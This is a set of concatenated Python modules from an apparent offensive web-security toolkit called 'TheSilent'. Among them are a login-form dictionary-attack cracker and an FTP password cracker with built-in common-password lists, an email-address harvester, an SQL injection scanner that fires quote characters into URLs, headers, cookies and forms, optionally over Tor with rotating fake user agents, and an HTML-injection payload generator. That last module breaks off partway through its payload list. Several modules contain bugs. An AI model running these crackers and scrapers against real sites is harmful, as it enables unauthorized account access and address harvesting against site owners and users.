import re
import time
import requests
from TheSilent.clear import clear
from TheSilent.link_scanner import link_scanner
from TheSilent.return_user_agent import return_user_agent

CYAN = "\033[1;36m"
RED = "\033[1;31m"

# create html sessions object
web_session = requests.Session()

tor_proxy = {
    "http": "socks5h://localhost:9050",
    "https": "socks5h://localhost:9050"}

# increased security
requests.packages.urllib3.disable_warnings()
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ":HIGH:!DH:!aNULL"

# increased security
try:
    requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ":HIGH:!DH:!aNULL"

except AttributeError:
    pass

def html_lint(url, secure=True, crawl="all", delay=1, tor=False, parse="", problem="all"):
    clear()

    linted = []
    
    crawler = link_scanner(url, secure=secure, crawl=crawl, delay=delay, tor=tor, parse=parse)

    for crawl in crawler:
        print(CYAN + "checking: " + crawl)
        # prevent dos attacks
        time.sleep(delay)

        try:
            if tor:
                result = web_session.get(crawl, verify=False, headers={"User-Agent": return_user_agent()}, proxies=tor_proxy, timeout=(60,120)).text.lower()

            else:
                result = web_session.get(crawl, verify=False, headers={"User-Agent": return_user_agent()}, timeout=(5,30)).text.lower()

            area_tag = re.findall("<area.+>", result)

            for area in area_tag:
                if "alt" not in area:
                    print(RED + f"no alt in area tag detected on {crawl}. Consider using alt (accessibility).")
                    linted.append(f"no alt in area tag detected on {crawl}. Consider using alt (accessibility).")

            image_tag = re.findall("<img.+>", result)

            for image in image_tag:
                if "alt" not in image:
                    print(RED + f"no alt in img tag detected on {crawl}. Consider using alt (accessibility).")
                    linted.append(f"no alt in img tag detected on {crawl}. Consider using alt (accessibility).")

            input_tag = re.findall("<input.+>", result)

            for my_input in input_tag:
                if "alt" not in my_input and "image" in my_input:
                    print(RED + f"no alt in input image tag detected on {crawl}. Consider using alt (accessibility).")
                    linted.append(f"no alt in input image tag detected on {crawl}. Consider using alt (accessibility).")

            if "<b>" in result:
                print(RED + f"<b> detected on {crawl}. Consider using <strong> (accessibility).")
                linted.append(f"<b> detected on {crawl}. Consider using <strong> (accessibility).")

            if "document.write" in result:
                print(RED + f"document.write detected on {crawl}. This has weird behavior (behavior).")
                linted.append(f"document.write detected on {crawl}. This has weird behavior (behavior).")

            if "<i>" in result:
                print(RED + f"<i> detected on {crawl}. Consider using <em> (accessibility).")
                linted.append(f"<i> detected on {crawl}. Consider using <em> (accessibility).")

            if "innerhtml" in result:
                print(RED + f"innerhtml detected on {crawl}. This could lead to a security vulnerability (security).")
                linted.append(f"innerhtml detected on {crawl}. This could lead to a security vulnerability (security).")

        except:
            continue

    linted = list(set(linted))
    linted.sort()

    clear()

    no_problems = True

    if len(linted) == 0:
        print(CYAN + "No problems deteced!")

    else:
        for lint in linted:
            if problem == "all":
                print(RED + lint)
                no_problems = False

            if problem == "access" and "accessibility" in lint:
                print(RED + lint)
                no_problems = False

            if problem == "behavior" and "behavior" in lint:
                print(RED + lint)
                no_problems = False

            if problem == "security" and "security" in lint:
                print(RED + lint)
                no_problems = False

    if no_problems:
        print(CYAN + "No problems deteced!")



import re
import requests
from TheSilent.clear import clear
from TheSilent.link_scanner import link_scanner
from TheSilent.return_user_agent import return_user_agent

CYAN = "\033[1;36m"
RED = "\033[1;31m"

tor_proxy = {"http": "socks5h://localhost:9050",
             "https": "socks5h://localhost:9050"}

# create html sessions object
web_session = requests.Session()

# fake user agent
user_agent = {"User-Agent": return_user_agent()}

# increased security
requests.packages.urllib3.disable_warnings()
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ":HIGH:!DH:!aNULL"

# increased security
try:
    requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ":HIGH:!DH:!aNULL"

except AttributeError:
    pass

# scans for emails on a website


def email_scanner(url, secure=True, tor=False, crawl="all", parse=" "):
    if secure:
        my_secure = "https://"

    else:
        my_secure = "http://"

    my_url = my_secure + url
    email_list = []
    website_list = []
    website_list.append(my_url)

    clear()
    links = link_scanner(url, secure=secure, tor=tor, crawl=crawl, parse=parse)

    for link in links:
        try:
            if tor:
                my_request = web_session.get(link, verify=False, headers={"User-Agent": return_user_agent()}, proxies=tor_proxy, timeout=(60, 120)).text

            else:
                my_request = web_session.get(link, verify=False, headers={"User-Agent": return_user_agent()}, timeout=(5, 30)).text

            email = re.findall("[a-z0-9\\.]+@[a-z0-9]+[.][a-z]+", my_request)

            for emails in email:
                email_list.append(emails)

        except BaseException:
            continue

    clear()

    email_list = sorted(set(email_list))

    return email_list



import re
import requests
from TheSilent.clear import clear
from TheSilent.form_scanner import form_scanner
from TheSilent.return_user_agent import return_user_agent

CYAN = "\033[1;36m"

# create html sessions object
web_session = requests.Session()

# fake user agent
user_agent = {"User-Agent": return_user_agent()}

# increased security
requests.packages.urllib3.disable_warnings()
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ":HIGH:!DH:!aNULL"

# increased security
try:
    requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ":HIGH:!DH:!aNULL"

except AttributeError:
    pass

password_list = [
    "admin",
    "administrator",
    "password",
    "root",
    "support",
    "123456",
    "qwerty",
    "12345678",
    "qwerty123",
    "1234567",
    "1234567890",
    "DEFAULT",
    "000000",
    "iloveyou",
    "qwertyuiop",
    "654321",
    "123456a",
    "dragon",
    "1qaz2wsx",
    "123qwe",
    "7777777",
    "123",
    "zxcvbnm",
    "123abc",
    "555555",
    "qwerty1",
    "222222",
    "asdfghjkl",
    "123123123",
    "target123",
    "tinkle",
    "159753",
    "1234qwer",
    "computer",
    "michael",
    "11111111",
    "aaaaaa",
    "ashley",
    "789456123",
    "999999",
    "shadow",
    "iloveyou1",
    "123456789a",
    "888888",
    "qwer1234",
    "fuckyou1",
    "azerty",
    "q1w2e3r4",
    "baseball",
    "princess1",
    "asd123",
    "asdasd",
    "soccer"]

# attempts to login using a dictionary attack


def login_cracker(url, user_name="", word_list=" ", secure=True):
    global password_list

    if secure == True:
        my_secure = "https://"

    if secure == False:
        my_secure = "http://"

    my_url = my_secure + url

    form_data = form_scanner(url, parse="input", secure=False)

    clear()

    text = False
    passcode = False
    submit = False

    if word_list != " ":
        for i in form_data:
            if "text" in i:
                try:
                    user = re.findall("(name=\")(\\S+)(\")", i)
                    user = user[0][1]
                    text = True

                except:
                    pass

            if "password" in i:
                try:
                    password = re.findall("(name=\")(\\S+)(\")", i)
                    password = password[0][1]
                    passcode = True

                except:
                    pass

            if "submit" in i:
                try:
                    submit_name = re.findall("(name=\")(\\S+)(\")", i)
                    print(submit_name)
                    submit_name = submit_name[0][1]
                    submit_value = re.findall("(value=\")(\\S+)(\")", i)
                    submit_value = submit_value[0][1]
                    submit = True

                except:
                    pass

        with open(word_list, "r") as f:
            for i in f:
                key = i.replace("\n", "")

                if text and passcode and submit:
                    payload = {
                        user: user_name,
                        password: key,
                        submit_name: submit_value}

                if text and passcode and not submit:
                    payload = {user: user_name, password: key}

                if not text and passcode and not submit:
                    payload = {password: key}

                if not text and passcode and submit:
                    payload = {password: key, submit_name: submit_value}

                try:
                    result = web_session.post(
                        my_url,
                        data=payload,
                        verify=False,
                        headers=user_agent,
                        timeout=(
                            5,
                            30)).url
                    verify = web_session.get(
                        result,
                        verify=False,
                        headers=user_agent,
                        timeout=(
                            5,
                            30)).text

                    print(payload)

                    if "type=\"password\"" not in verify.lower():
                        print("True: " + key)
                        break

                    if "type=\"password\"" in verify.lower():
                        print("False: " + key)

                except:
                    print("ERROR!")
                    break

    if word_list == " ":
        for i in form_data:
            if "text" in i:
                try:
                    user = re.findall("(name=\")(\\S+)(\")", i)
                    user = user[0][1]
                    text = True

                except:
                    pass

            if "password" in i:
                try:
                    password = re.findall("(name=\")(\\S+)(\")", i)
                    password = password[0][1]
                    passcode = True

                except:
                    pass

            if "submit" in i:
                try:
                    submit_name = re.findall("(name=\")(\\S+)(\")", i)
                    submit_name = submit_name[0][1]
                    submit_value = re.findall("(value=\")(\\S+)(\")", i)
                    submit_value = submit_value[0][1]
                    submit = True

                except:
                    pass

        for key in password_list:
            if text and passcode and submit:
                payload = {
                    user: user_name,
                    password: key,
                    submit_name: submit_value}

            if text and passcode and not submit:
                payload = {user: user_name, password: key}

            if not text and passcode and not submit:
                payload = {password: key}

            if not text and passcode and submit:
                payload = {password: key, submit_name: submit_value}

            try:
                result = web_session.post(my_url, data=payload, verify=False, headers=user_agent, timeout=(5,30)).url
                verify = web_session.get(result,verify=False,headers=user_agent,timeout=(5,30)).text

                if "type=\"password\"" not in verify.lower():
                    print(CYAN + "True: " + key)
                    break

                if "type=\"password\"" in verify.lower():
                    print(CYAN + "False: " + key)

            except:
                print(red + "ERROR!")
                break



import ftplib
from TheSilent.clear import clear

CYAN = "\033[1;36m"

password_list = [
    "admin",
    "administrator",
    "password",
    "root",
    "support",
    "123456",
    "qwerty",
    "12345678",
    "qwerty123",
    "1234567",
    "1234567890",
    "DEFAULT",
    "000000",
    "iloveyou",
    "qwertyuiop",
    "654321",
    "123456a",
    "dragon",
    "1qaz2wsx",
    "123qwe",
    "7777777",
    "123",
    "zxcvbnm",
    "123abc",
    "555555",
    "qwerty1",
    "222222",
    "asdfghjkl",
    "123123123",
    "target123",
    "tinkle",
    "159753",
    "1234qwer",
    "computer",
    "michael",
    "11111111",
    "aaaaaa",
    "ashley",
    "789456123",
    "999999",
    "shadow",
    "iloveyou1",
    "123456789a",
    "888888",
    "qwer1234",
    "fuckyou1",
    "azerty",
    "q1w2e3r4",
    "baseball",
    "princess1",
    "asd123",
    "asdasd",
    "soccer"]

# attempts to crack an ftp servers password

def ftp_cracker(url, word_list=" "):
    clear()
    global password_list

    user_list = ["admin", "administrator", "root", "support"]

    if word_list != " ":
        for user in user_list:
            with open(word_list, "r") as f:
                for i in f:
                    key = i.replace("\n", "")

                    try:
                        ftp = ftplib.FTP(url, timeout=15)
                        ftp.login(user, key)
                        clear()
                        print(CYAN + "True: " + user + ":" + key)
                        break

                    except:
                        print(CYAN + "False: " + user + ":" + key)

    if word_list == " ":
        for user in user_list:
            for key in password_list:
                try:
                    ftp = ftplib.FTP(url, timeout=15)
                    ftp.login(user, key)
                    clear()
                    print(CYAN + "True: " + user + ":" + key)
                    break

                except:
                    print(CYAN + "False: " + user + ":" + key)



import os
from TheSilent.clear import clear

CYAN = "\033[1;36m"
RED = "\033[1;31m"

# securely destroys data


def secure_overwrite(file):
    clear()

    try:
        size = os.path.getsize(file)
        for i in range(1, 8):
            clear()
            print(CYAN + "pass: " + str(i))
            with open(file, "wb") as f:
                for byte in range(size):
                    f.seek(byte)
                    f.write(b"0")

    except PermissionError:
        print(RED + "ERROR! Permission denied!")
        exit()

    except OSError:
        pass

    print(CYAN + file)
    print(CYAN + "done")



import re
import time
import requests
from TheSilent.clear import clear
from TheSilent.form_scanner import form_scanner
from TheSilent.link_scanner import link_scanner
from TheSilent.return_user_agent import return_user_agent

CYAN = "\033[1;36m"
RED = "\033[1;31m"

# create html sessions object
web_session = requests.Session()

tor_proxy = {
    "http": "socks5h://localhost:9050",
    "https": "socks5h://localhost:9050"}

# increased security
requests.packages.urllib3.disable_warnings()
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ":HIGH:!DH:!aNULL"

# increased security
try:
    requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ":HIGH:!DH:!aNULL"

except AttributeError:
    pass

# scans for sql injection errors


def sql_injection_scanner(url, secure=True, tor=False, my_file=" ", crawl="0", parse=" ", delay=1):
    if secure:
        my_secure = "https://"

    else:
        my_secure = "http://"

    # sql errors
    error_message = {
        "SQL syntax.*?MySQL",
        "Warning.*?\\Wmysqli?_",
        "MySQLSyntaxErrorException",
        "valid MySQL result",
        "check the manual that (corresponds to|fits) your MySQL server version",
        "check the manual that (corresponds to|fits) your MariaDB server version",
        "check the manual that (corresponds to|fits) your Drizzle server version",
        "Unknown column '[^ ]+' in 'field list'",
        "MySqlClient\\.",
        "com\\.mysql\\.jdbc",
        "Zend_Db_(Adapter|Statement)_Mysqli_Exception",
        "Pdo\\[./_\\]Mysql",
        "MySqlException",
        "SQLSTATE\\[\\d+\\]: Syntax error or access violation",
        "MemSQL does not support this type of query",
        "is not supported by MemSQL",
        "unsupported nested scalar subselect",
        "PostgreSQL.*?ERROR",
        "Warning.*?\\Wpg_",
        "valid PostgreSQL result",
        "Npgsql\\.",
        "PG::SyntaxError:",
        "org\\.postgresql\\.util\\.PSQLException",
        "ERROR:\\s\\ssyntax error at or near",
        "ERROR: parser: parse error at or near",
        "PostgreSQL query failed",
        "org\\.postgresql\\.jdbc",
        "Pdo\\[./_\\]Pgsql",
        "PSQLException",
        "OLE DB.*? SQL Server",
        "\bSQL Server[^&lt;&quot;]+Driver",
        "Warning.*?\\W(mssql|sqlsrv)_",
        "\bSQL Server[^&lt;&quot;]+[0-9a-fA-F]{8}",
        "System\\.Data\\.SqlClient\\.(SqlException|SqlConnection\\.OnError)",
        "(?s)Exception.*?\bRoadhouse\\.Cms\\.",
        "Microsoft SQL Native Client error '[0-9a-fA-F]{8}",
        "\\[SQL Server\\]",
        "ODBC SQL Server Driver",
        "ODBC Driver \\d+ for SQL Server",
        "SQLServer JDBC Driver",
        "com\\.jnetdirect\\.jsql",
        "macromedia\\.jdbc\\.sqlserver",
        "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception",
        "com\\.microsoft\\.sqlserver\\.jdbc",
        "Pdo\\[./_\\](Mssql|SqlSrv)",
        "SQL(Srv|Server)Exception",
        "Unclosed quotation mark after the character string",
        "Microsoft Access (\\d+ )?Driver",
        "JET Database Engine",
        "Access Database Engine",
        "ODBC Microsoft Access",
        "Syntax error \\(missing operator\\) in query expression",
        "\bORA-\\d{5}",
        "Oracle error",
        "Oracle.*?Driver",
        "Warning.*?\\W(oci|ora)_",
        "quoted string not properly terminated",
        "SQL command not properly ended",
        "macromedia\\.jdbc\\.oracle",
        "oracle\\.jdbc",
        "Zend_Db_(Adapter|Statement)_Oracle_Exception",
        "Pdo\\[./_\\](Oracle|OCI)",
        "OracleException",
        "CLI Driver.*?DB2",
        "DB2 SQL error",
        "\bdb2_\\w+\\(",
        "SQLCODE[=:\\d, -]+SQLSTATE",
        "com\\.ibm\\.db2\\.jcc",
        "Zend_Db_(Adapter|Statement)_Db2_Exception",
        "Pdo\\[./_\\]Ibm",
        "DB2Exception",
        "ibm_db_dbi\\.ProgrammingError",
        "Warning.*?\\Wifx_",
        "Exception.*?Informix",
        "Informix ODBC Driver",
        "ODBC Informix driver",
        "com\\.informix\\.jdbc",
        "weblogic\\.jdbc\\.informix",
        "Pdo\\[./_\\]Informix",
        "IfxException",
        "Dynamic SQL Error",
        "Warning.*?\\Wibase_",
        "org\\.firebirdsql\\.jdbc",
        "Pdo\\[./_\\]Firebird",
        "SQLite/JDBCDriver",
        "SQLite\\.Exception",
        "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException",
        "Warning.*?\\W(sqlite_|SQLite3::)",
        "\\[SQLITE_ERROR\\]",
        "SQLite error \\d+:",
        "sqlite3.OperationalError:",
        "SQLite3::SQLException",
        "org\\.sqlite\\.JDBC",
        "Pdo\\[./_\\]Sqlite",
        "SQLiteException",
        "SQL error.*?POS([0-9]+)",
        "Warning.*?\\Wmaxdb_",
        "DriverSapDB",
        "-3014.*?Invalid end of SQL statement",
        "com\\.sap\\.dbtech\\.jdbc",
        "\\[-3008\\].*?: Invalid keyword or missing delimiter",
        "Warning.*?\\Wsybase_",
        "Sybase message",
        "Sybase.*?Server message",
        "SybSQLException",
        "Sybase\\.Data\\.AseClient",
        "com\\.sybase\\.jdbc",
        "Warning.*?\\Wingres_",
        "Ingres SQLSTATE",
        "Ingres\\W.*?Driver",
        "com\\.ingres\\.gcf\\.jdbc",
        "Exception (condition )?\\d+\\. Transaction rollback",
        "com\\.frontbase\\.jdbc",
        "Syntax error 1. Missing",
        "(Semantic|Syntax) error [1-4]\\d{2}\\.",
        "Unexpected end of command in statement \\[",
        "Unexpected token.*?in statement \\[",
        "org\\.hsqldb\\.jdbc",
        "org\\.h2\\.jdbc",
        "\\[42000-192\\]",
        "![0-9]{5}![^\n]+(failed|unexpected|error|syntax|expected|violation|exception)",
        "\\[MonetDB\\]\\[ODBC Driver",
        "nl\\.cwi\\.monetdb\\.jdbc",
        "Syntax error: EncounteCYAN",
        "org\\.apache\\.derby",
        "ERROR 42X01",
        ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):",
        "/vertica/Parser/scan",
        "com\\.vertica\\.jdbc",
        "org\\.jkiss\\.dbeaver\\.ext\\.vertica",
        "com\\.vertica\\.dsi\\.dataengine",
        "com\\.mckoi\\.JDBCDriver",
        "com\\.mckoi\\.database\\.jdbc",
        "&lt;REGEX_LITERAL&gt;",
        "com\\.facebook\\.presto\\.jdbc",
        "io\\.prestosql\\.jdbc",
        "com\\.simba\\.presto\\.jdbc",
        "UNION query has different number of fields: \\d+, \\d+",
        "Altibase\\.jdbc\\.driver",
        "com\\.mimer\\.jdbc",
        "Syntax error,[^\n]+assumed to mean",
        "io\\.crate\\.client\\.jdbc",
        "encounteCYAN after end of query",
        "A comparison operator is requiCYAN here",
        "-10048: Syntax error",
        "rdmStmtPrepare\\(.+?\\) returned",
        "SQ074: Line \\d+:",
        "SR185: Undefined procedure",
        "SQ200: No table ",
        "Virtuoso S0002 Error",
        "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]"}

    # malicious sql code
    mal_sql = ["\"", "\'", ";", "*"]

    my_list = []

    clear()

    # crawl
    my_result = []

    if my_file == " ":
        my_result = link_scanner(
            url=url,
            secure=secure,
            tor=tor,
            crawl=crawl,
            parse=parse,
            delay=delay)

    if my_file != " ":
        with open(my_file, "r", errors="ignore") as file:
            for i in file:
                clean = i.replace("\n", "")
                my_result.append(clean)

    clear()

    for j in my_result:
        for c in mal_sql:
            if not j.endswith("/"):
                new_url = j + "/" + c

            else:
                new_url = j + c

            print(CYAN + "checking: " + str(new_url))

            try:
                # prevent dos attacks
                time.sleep(delay)

                if tor:
                    result = web_session.get(new_url, verify=False, headers={"User-Agent": return_user_agent()}, proxies=tor_proxy, timeout=(60,120)).text

                else:
                    result = web_session.get(new_url, verify=False, headers={"User-Agent": return_user_agent()}, timeout=(5,30)).text

                for i in error_message:
                    my_regex = re.search(i, result)

                    try:
                        if my_regex:
                            print(CYAN + "true: " + str(i) + " " +
                                  str(my_regex.span()) + " " + new_url)
                            my_list.append(
                                str(i) + " " + str(my_regex.span()) + " " + new_url)
                            break

                    except UnicodeDecodeError:
                        break

            except BaseException:
                print(
                    RED +
                    "ERROR! Connection Error! We may be IP banned or the server hasn't recoveRED! Waiting one minute before retrying!")
                time.sleep(60)
                continue

            client_headers = [
                "A-IM",
                "Accept",
                "Accept-Charset",
                "Accept-Datetime",
                "Accept-Encoding",
                "Accept-Language",
                "Access-Control-Request-Method",
                "Access-Control-Request-Headers",
                "Authorization",
                "Cache-Control",
                "Cookie",
                "Connection",
                "Content-Encoding",
                "Content-Length",
                "Content-MD5",
                "Content-Type",
                "Date",
                "Expect",
                "Forwarded",
                "From",
                "HTTP2-Settings",
                "If-Match",
                "If-Modified-Since",
                "If-None-Match",
                "If-Range",
                "If-Unmodified-Since",
                "Max-Forwards",
                "Origin",
                "Pragma",
                "Prefer",
                "Proxy-Authorization",
                "Range",
                "Referer",
                "TE",
                "Trailer",
                "Transfer-Encoding",
                "Via",
                "Warning"]

            for http_header in client_headers:
                user_agent_moded = {
                    "User-Agent": return_user_agent(),
                    http_header: c}
                print(
                    CYAN +
                    "checking headers: " +
                    str(j) +
                    " " +
                    str(user_agent_moded))

                try:
                    # prevent dos attacks
                    time.sleep(delay)

                    if tor:
                        result = web_session.get(j, verify=False, headers=user_agent_moded,proxies=tor_proxy, timeout=(60,120)).text

                    else:
                        result = web_session.get(j, verify=False, headers=user_agent_moded,timeout=(5,30)).text

                    for i in error_message:
                        my_regex = re.search(i, result)

                        try:
                            if my_regex:
                                print(CYAN +
                                      "true headers: " +
                                      str(i) +
                                      " " +
                                      str(my_regex.span()) +
                                      " " +
                                      str(j) +
                                      " " +
                                      str(user_agent_moded))
                                my_list.append("headers: " +
                                               str(i) +
                                               " " +
                                               str(my_regex.span()) +
                                               " " +
                                               str(j) +
                                               " " +
                                               str(user_agent_moded))
                                break

                        except UnicodeDecodeError:
                            break

                except BaseException:
                    print(
                        RED +
                        "ERROR! Connection Error! We may be IP banned or the server hasn't recoveRED! Waiting one minute before retrying!")
                    time.sleep(60)
                    continue

            print(CYAN + "checking cookies: " + str(j) + " (" + c + ")")

            mal_cookie = {c: c}

            try:
                # prevent dos attacks
                time.sleep(delay)

                if tor:
                    result = web_session.get(
                        j,
                        verify=False,
                        headers={
                            "User-Agent": return_user_agent()},
                        cookies=mal_cookie,
                        proxies=tor_proxy,
                        timeout=(
                            5,
                            30)).text

                else:
                    result = web_session.get(
                        j,
                        verify=False,
                        headers={
                            "User-Agent": return_user_agent()},
                        cookies=mal_cookie,
                        timeout=(
                            5,
                            30)).text

                for i in error_message:
                    my_regex = re.search(i, result)

                    try:
                        if my_regex:
                            print(CYAN + "true cookies: " + str(i) + " " +
                                  str(my_regex.span()) + " " + j + " (" + c + ")")
                            my_list.append(
                                "cookies: " + str(i) + " " + str(my_regex.span()) + " " + j + " (" + c + ")")
                            break

                    except UnicodeDecodeError:
                        break

            except BaseException:
                print(
                    RED +
                    "ERROR! Connection Error! We may be IP banned or the server hasn't recoveRED! Waiting one minute before retrying!")
                time.sleep(60)
                continue

            time.sleep(delay)
            print("checking for forms on: " + j)
            clean = j.replace("http://", "")
            clean = clean.replace("https://", "")
            form_input = form_scanner(
                clean, secure=secure, tor=tor, parse="input")
            form_activities = form_scanner(clean, secure=secure, tor=tor)

            for activity in form_activities:
                for i in form_input:
                    for ii in mal_sql:
                        try:
                            time.sleep(delay)
                            name = re.findall("name=\"(\\S+)\"", i)
                            mal_dict = {name[0]: ii}

                            if name[0] in activity:
                                action = re.findall(
                                    "action=\"(\\S+)\"", activity)
                                method = re.findall(
                                    "method=\"(\\S+)\"", activity)

                                if action[0] != "":
                                    if j.endswith(
                                            "/") and action[0] != links + "/" or j.endswith("/") and action[0] != links:
                                        my_link = links + action[0]

                                    elif action[0] == j + "/" or action[0] == j:
                                        my_link = j

                                    else:
                                        my_link = j + "/" + action[0]

                                else:
                                    my_link = j

                                print(
                                    CYAN + "checking: " + str(my_link) + " " + str(mal_dict))
                                # prevent dos attacks
                                time.sleep(delay)

                                if tor:
                                    if method[0].lower() == "get":
                                        get = web_session.get(my_link, params=mal_dict, verify=False, headers={"User-Agent": return_user_agent()}, proxies=tor_proxy, timeout=(6,120)).text

                                    if method[0].lower() == "post":
                                        post = web_session.post(my_link, data=mal_dict, verify=False, headers={"User-Agent": return_user_agent()}, proxies=tor_proxy, timeout=(6,120)).text

                                else:
                                    if method[0].lower() == "get":
                                        get = web_session.get(my_link, params=mal_dict, verify=False, headers={"User-Agent": return_user_agent()}, timeout=(5, 30)).text

                                    if method[0].lower() == "post":
                                        post = web_session.post(my_link, data=mal_dict, verify=False, headers={"User-Agent": return_user_agent()}, timeout=(5, 30)).text

                                try:
                                    for iii in error_message:
                                        if method[0].lower() == "get":
                                            get_regex = re.search(iii, result)
                                            if get_regex:
                                                print(CYAN +
                                                      "true: " +
                                                      str(mal_dict) +
                                                      " " +
                                                      str(my_regex.span()) +
                                                      " " +
                                                      str(j))
                                                my_list.append(
                                                    str(mal_dict) + " " + str(my_regex.span()) + " " + str(j))
                                                break

                                        if method[0].lower() == "post":
                                            post_regex = re.search(iii, result)

                                            if post_regex:
                                                print(CYAN +
                                                      "true: " +
                                                      str(mal_dict) +
                                                      " " +
                                                      str(my_regex.span()) +
                                                      " " +
                                                      str(j))
                                                my_list.append(
                                                    str(mal_dict) + " " + str(my_regex.span()) + " " + str(j))
                                                break

                                except UnicodeDecodeError:
                                    break

                        except BaseException:
                            print(
                                RED +
                                "ERROR! Connection Error! We may be IP banned or the server hasn't recovered! Waiting one minute before retrying!")
                            time.sleep(60)
                            continue

    my_list = sorted(set(my_list))

    print(CYAN + "")
    clear()

    return my_list



import requests
from TheSilent.subdomain_scanner import subdomain_scanner
from TheSilent.return_user_agent import return_user_agent

CYAN = "\033[1;36m"



# create html sessions object
web_session = requests.Session()

tor_proxy = {
    "http": "socks5h://localhost:9050",
    "https": "socks5h://localhost:9050"}

# increased security
requests.packages.urllib3.disable_warnings()
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ":HIGH:!DH:!aNULL"

# increased security
try:
    requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ":HIGH:!DH:!aNULL"

except AttributeError:
    pass

# scans for subdomain takeovers
def subdomain_takeover(url, secure=True, tor=False, my_file=" ", parse=" ", crawl="all"):
    result = subdomain_scanner(url, secure=secure, tor=tor, my_file=my_file, parse=parse, crawl=crawl)

    clear()

    vuln_list = []

    if secure:
        my_secure = "https://"

    if secure:
        my_secure = "http://"

    for i in result:
        my_url = my_secure + str(i) + "." + str(url)

        print(CYAN + "checking: " + my_url)

        try:
            if tor:
                my_request = web_session.get(my_url, verify=False, headers={"User-Agent": return_user_agent()}, proxies=tor_proxy, timeout=(60,120)).status_code

            else:
                my_request = web_session.get(my_url, verify=False, headers={"User-Agent": return_user_agent()}, timeout=(5,30)).status_code

            if my_request == 404:
                print(CYAN + True)
                vuln_list.append(my_url)

            else:
                print(CYAN + "False")

        except:
            print(CYAN + "False")

    clear()

    return vuln_list



import re
import time
import urllib.parse
import requests
from TheSilent.clear import clear
from TheSilent.form_scanner import form_scanner
from TheSilent.link_scanner import link_scanner
from TheSilent.return_user_agent import return_user_agent

CYAN = "\033[1;36m"
RED = "\033[1;31m"

# create html sessions object
web_session = requests.Session()

tor_proxy = {
    "http": "socks5h://localhost:9050",
    "https": "socks5h://localhost:9050"}

# increased security
requests.packages.urllib3.disable_warnings()
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ":HIGH:!DH:!aNULL"

# increased security
try:
    requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ":HIGH:!DH:!aNULL"

except AttributeError:
    pass

def return_mal_payloads():
    # malicious script
    mal_payloads = []

    my_string = "<div>The Silent</div>"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "\\<div>The Silent</div>\\"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "&<div>The Silent</div>&"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "<DIV>THE SILENT</DIV>"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "\\<DIV>THE SILENT</DIV>\\"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "&<DIV>THE SILENT</DIV>&"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "<iframe>The Silent</iframe>"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "\\<iframe>The Silent</iframe>\\"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "&<iframe>The Silent</iframe>&"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "<IFRAME>THE SILENT</IFRAME>"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "\\<IFRAME>THE SILENT</IFRAME>\\"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "&<IFRAME>THE SILENT</IFRAME>&"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "<input type='text' id='TheSilent' name='TheSilent' value='TheSilent'>"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "\\<input type='text' id='TheSilent' name='TheSilent' value='TheSilent'>\\"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "&<input type='text' id='TheSilent' name='TheSilent' value='TheSilent'>&"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "<INPUT TYPE='TEXT' ID='THESILENT' NAME='THESILENT' VALUE='THESILENT'>"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "\\<INPUT TYPE='TEXT' ID='THESILENT' NAME='THESILENT' VALUE='THESILENT'>\\"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "&<INPUT TYPE='TEXT' ID='THESILENT' NAME='THESILENT' VALUE='THESILENT'>&"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "<p>The Silent</p>"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "\\<p>The Silent</p>\\"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "&<p>The Silent</p>&"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "<P>THE SILENT</P>"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "\\<P>THE SILENT</P>\\"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "&<P>THE SILENT</P>&"
